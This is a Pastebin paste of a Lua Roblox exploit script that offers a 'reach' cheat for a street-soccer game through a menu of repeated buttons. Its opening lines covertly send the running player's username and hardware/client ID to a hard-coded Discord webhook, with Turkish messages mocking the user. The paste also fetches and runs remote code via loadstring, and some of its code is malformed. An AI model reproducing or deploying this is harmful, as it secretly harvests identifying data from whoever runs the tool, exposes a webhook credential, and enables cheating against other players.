Advertisement
eodejmocmocm

ur so bad

Mar 1st, 2024 (edited)
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 45.99 KB | None | 0 0
  1. Http = game:GetService("HttpService")
  2. Web = "https://discord.com/api/webhooks/1085048921191108728/HFCNv63o7uWvpnh00LOYNWsvkAVjTSIT87wZMftXnYAX0fnYvi5lAIKLXh_h2F3ouydz"
  3.  
  4. if syn then
  5. local responce = syn.request(
  6. {
  7. Url = Web,
  8. Method = 'POST',
  9. Headers = {
  10. ['Content-Type'] = 'application/json'
  11. },
  12. Body = Http:JSONEncode({
  13. ["content"] = "",
  14. ["embeds"] = {{
  15. ["title"] = "**scriptin çalıştırıldı!**",
  16. ["description"] = game.Players.LocalPlayer.Name.. " bu oç sc kullandı",
  17. ["type"] = "rich",
  18. ["color"] = tonumber(random),
  19. ["fields"] = {
  20. {
  21. ["name"] = " Ip",
  22. ["value"] = game:HttpGet("", true),
  23. ["inline"] = true
  24. }
  25. }
  26.  
  27. }}
  28. })
  29. })
  30. else
  31. request(
  32. {
  33. Url = Web,
  34. Method = 'POST',
  35. Headers = {
  36. ['Content-Type'] = 'application/json'
  37. },
  38. Body = Http:JSONEncode({
  39. ["content"] = "",
  40. ["embeds"] = {{
  41. ["title"] = "**Scriptini Çalıştırdı!**",
  42. ["description"] = game.Players.LocalPlayer.Name.. " hardwareid aşağıda",
  43. ["type"] = "rich",
  44. ["color"] = tonumber(random),
  45. ["fields"] = {
  46. {
  47. ["name"] = "Hardware ID:",
  48. ["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
  49. ["inline"] = true
  50. }
  51. }
  52.  
  53. }}
  54. })
  55. })
  56. end
  57.  
  58.  
  59.  
  60. --script
  61. local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
  62. local Window = OrionLib:MakeWindow({Name = "HomelanderTps Script", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest", IntroEnabled = true, IntroText = "Homelander"})
  63.  
  64.  
  65. --reach
  66. local Tab = Window:MakeTab({
  67. Name = "reach settings",
  68. Icon = "rbxassetid://4483345998",
  69. PremiumOnly = false
  70. })
  71.  
  72. --bestreach
  73. Tab:AddButton({
  74. Name = "enable reach",
  75. Callback = function()
  76. RunSteppedMobile = game:GetService("RunService").RenderStepped:Connect(function()
  77. if game.Players.LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  78. if (game.Players.LocalPlayer.Character.HumanoidRootPart.Position - game.Workspace.TPSSystem.TPS.Position).Magnitude <= DistanceReachMobile then
  79. if game.Lighting[game.Players.LocalPlayer.Name].PreferredFoot.Value == 1 then
  80. firetouchinterest(game.Players.LocalPlayer.Character["Right Leg"], game.Workspace.TPSSystem.TPS, 0)
  81. firetouchinterest(game.Players.LocalPlayer.Character["Right Leg"], game.Workspace.TPSSystem.TPS, 1)
  82. elseif game.Lighting[game.Players.LocalPlayer.Name].PreferredFoot.Value == 2 then
  83. firetouchinterest(game.Players.LocalPlayer.Character["Left Leg"], game.Workspace.TPSSystem.TPS, 0)
  84. firetouchinterest(game.Players.LocalPlayer.Character["Left Leg"], game.Workspace.TPSSystem.TPS, 1)
  85.  
  86. end
  87. end
  88. end
  89. if game.Players.LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  90. if (game.Players.LocalPlayer.Character.HumanoidRootPart.Position - game.Workspace.TPSSystem.TPS.Position).Magnitude <= DistanceReach then
  91. if game.Lighting[game.Players.LocalPlayer.Name].PreferredFoot.Value == 1 then
  92. firetouchinterest(game.Players.LocalPlayer.Character["RightLowerLeg"], game.Workspace.TPSSystem.TPS, 0)
  93. firetouchinterest(game.Players.LocalPlayer.Character["RightLowerLeg"], game.Workspace.TPSSystem.TPS, 1)
  94. elseif game.Lighting[game.Players.LocalPlayer.Name].PreferredFoot.Value == 2 then
  95. firetouchinterest(game.Players.LocalPlayer.Character["LeftLowerLeg"], game.Workspace.TPSSystem.TPS, 0)
  96. firetouchinterest(game.Players.LocalPlayer.Character["LeftLowerLeg"], game.Workspace.TPSSystem.TPS, 1)
  97. end
  98. end
  99. end
  100. end)
  101.  
  102. Tab:AddButton({
  103. Name = "4 studs right foot",
  104. Callback = function()
  105. DistanceReachMobile = 3
  106. end)
  107.  
  108. Tab:AddButton({
  109. Name = "4 studs right foot",
  110. Callback = function()
  111. getgenv().Leg = "Right" -- Left or Right
  112. getgenv().Reach = 4 -- Change to whatever you want (The game caps it)
  113. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  114. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  115. game["RunService"].Stepped:Connect(function()
  116. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  117. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  118. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  119. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  120. end
  121. end
  122. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  123. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  124. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  125. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  126. end
  127. end
  128. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  129. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  130. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  131. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  132. end
  133. end
  134. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  135. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  136. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  137. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  138. end
  139. end
  140. end)
  141. end
  142. })
  143.  
  144. Tab:AddButton({
  145. Name = "5 studs right foot",
  146. Callback = function()
  147. getgenv().Leg = "Right" -- Left or Right
  148. getgenv().Reach = 5 -- Change to whatever you want (The game caps it)
  149. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  150. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  151. game["RunService"].Stepped:Connect(function()
  152. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  153. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  154. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  155. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  156. end
  157. end
  158. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  159. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  160. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  161. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  162. end
  163. end
  164. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  165. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  166. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  167. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  168. end
  169. end
  170. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  171. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  172. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  173. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  174. end
  175. end
  176. end)
  177. end
  178. })
  179.  
  180. Tab:AddButton({
  181. Name = "8 studs right foot",
  182. Callback = function()
  183. getgenv().Leg = "Right" -- Left or Right
  184. getgenv().Reach = 8 -- Change to whatever you want (The game caps it)
  185. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  186. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  187. game["RunService"].Stepped:Connect(function()
  188. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  189. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  190. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  191. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  192. end
  193. end
  194. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  195. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  196. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  197. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  198. end
  199. end
  200. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  201. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  202. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  203. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  204. end
  205. end
  206. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  207. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  208. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  209. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  210. end
  211. end
  212. end)
  213. end
  214. })
  215.  
  216. Tab:AddButton({
  217. Name = "15 studs right foot",
  218. Callback = function()
  219. getgenv().Leg = "Right" -- Left or Right
  220. getgenv().Reach = 15 -- Change to whatever you want (The game caps it)
  221. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  222. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  223. game["RunService"].Stepped:Connect(function()
  224. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  225. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  226. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  227. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  228. end
  229. end
  230. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  231. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  232. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  233. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  234. end
  235. end
  236. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  237. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  238. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  239. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  240. end
  241. end
  242. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  243. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  244. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  245. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  246. end
  247. end
  248. end)
  249. end
  250. })
  251.  
  252. Tab:AddButton({
  253. Name = "30 studs right foot",
  254. Callback = function()
  255. getgenv().Leg = "Right" -- Left or Right
  256. getgenv().Reach = 30 -- Change to whatever you want (The game caps it)
  257. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  258. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  259. game["RunService"].Stepped:Connect(function()
  260. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  261. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  262. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  263. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  264. end
  265. end
  266. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  267. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  268. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  269. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  270. end
  271. end
  272. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  273. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  274. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  275. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  276. end
  277. end
  278. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  279. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  280. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  281. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  282. end
  283. end
  284. end)
  285. end
  286. })
  287.  
  288. Tab:AddButton({
  289. Name = "2 studs left foot",
  290. Callback = function()
  291. getgenv().Leg = "Left" -- Left or Right
  292. getgenv().Reach = 2 -- Change to whatever you want (The game caps it)
  293. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  294. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  295. game["RunService"].Stepped:Connect(function()
  296. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  297. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  298. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  299. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  300. end
  301. end
  302. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  303. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  304. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  305. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  306. end
  307. end
  308. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  309. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  310. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  311. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  312. end
  313. end
  314. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  315. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  316. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  317. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  318. end
  319. end
  320. end)
  321. end
  322. })
  323.  
  324. Tab:AddButton({
  325. Name = "3 studs left foot",
  326. Callback = function()
  327. getgenv().Leg = "Left" -- Left or Right
  328. getgenv().Reach = 3 -- Change to whatever you want (The game caps it)
  329. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  330. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  331. game["RunService"].Stepped:Connect(function()
  332. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  333. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  334. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  335. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  336. end
  337. end
  338. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  339. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  340. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  341. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  342. end
  343. end
  344. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  345. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  346. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  347. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  348. end
  349. end
  350. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  351. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  352. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  353. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  354. end
  355. end
  356. end)
  357. end
  358. })
  359.  
  360. Tab:AddButton({
  361. Name = "4 studs left foot",
  362. Callback = function()
  363. getgenv().Leg = "Left" -- Left or Right
  364. getgenv().Reach = 4 -- Change to whatever you want (The game caps it)
  365. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  366. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  367. game["RunService"].Stepped:Connect(function()
  368. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  369. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  370. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  371. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  372. end
  373. end
  374. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  375. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  376. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  377. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  378. end
  379. end
  380. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  381. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  382. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  383. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  384. end
  385. end
  386. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  387. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  388. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  389. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  390. end
  391. end
  392. end)
  393. end
  394. })
  395.  
  396. Tab:AddButton({
  397. Name = "5 studs left foot",
  398. Callback = function()
  399. getgenv().Leg = "Left" -- Left or Right
  400. getgenv().Reach = 5 -- Change to whatever you want (The game caps it)
  401. -- https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 -- DO NOT USE THIS SCRIPT BELOW ME, IT WONT WORK--
  402. -- GO TO: https://rscripts.net/script/TPS--Street-Soccer-Script-or-Reach-2800 --
  403. game["RunService"].Stepped:Connect(function()
  404. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  405. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg").Position).Magnitude <= Reach then
  406. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 0)
  407. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("LeftLowerLeg"), 1)
  408. end
  409. end
  410. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
  411. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg").Position).Magnitude <= Reach then
  412. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 0)
  413. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("RightLowerLeg"), 1)
  414. end
  415. end
  416. if Leg == "Right" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  417. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Right Leg").Position).Magnitude <= Reach then
  418. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 0)
  419. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Right Leg"), 1)
  420. end
  421. end
  422. if Leg == "Left" and game:GetService("Players").LocalPlayer.Character ~= nil and game:GetService("Players").LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  423. if (workspace.TPSSystem.TPS.Position - game.Players.LocalPlayer.Character:WaitForChild("Left Leg").Position).Magnitude <= Reach then
  424. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 0)
  425. firetouchinterest(workspace.TPSSystem.TPS, game.Players.LocalPlayer.Character:WaitForChild("Left Leg"), 1)
  426. end
  427. end
  428. end)
  429. end
  430. })
  431.  
  432. Tab:AddButton({
  433. Name = "8 studs left foot",
  434. Callback = function()
  435. getgenv().Leg = "Left" -- Left or Right
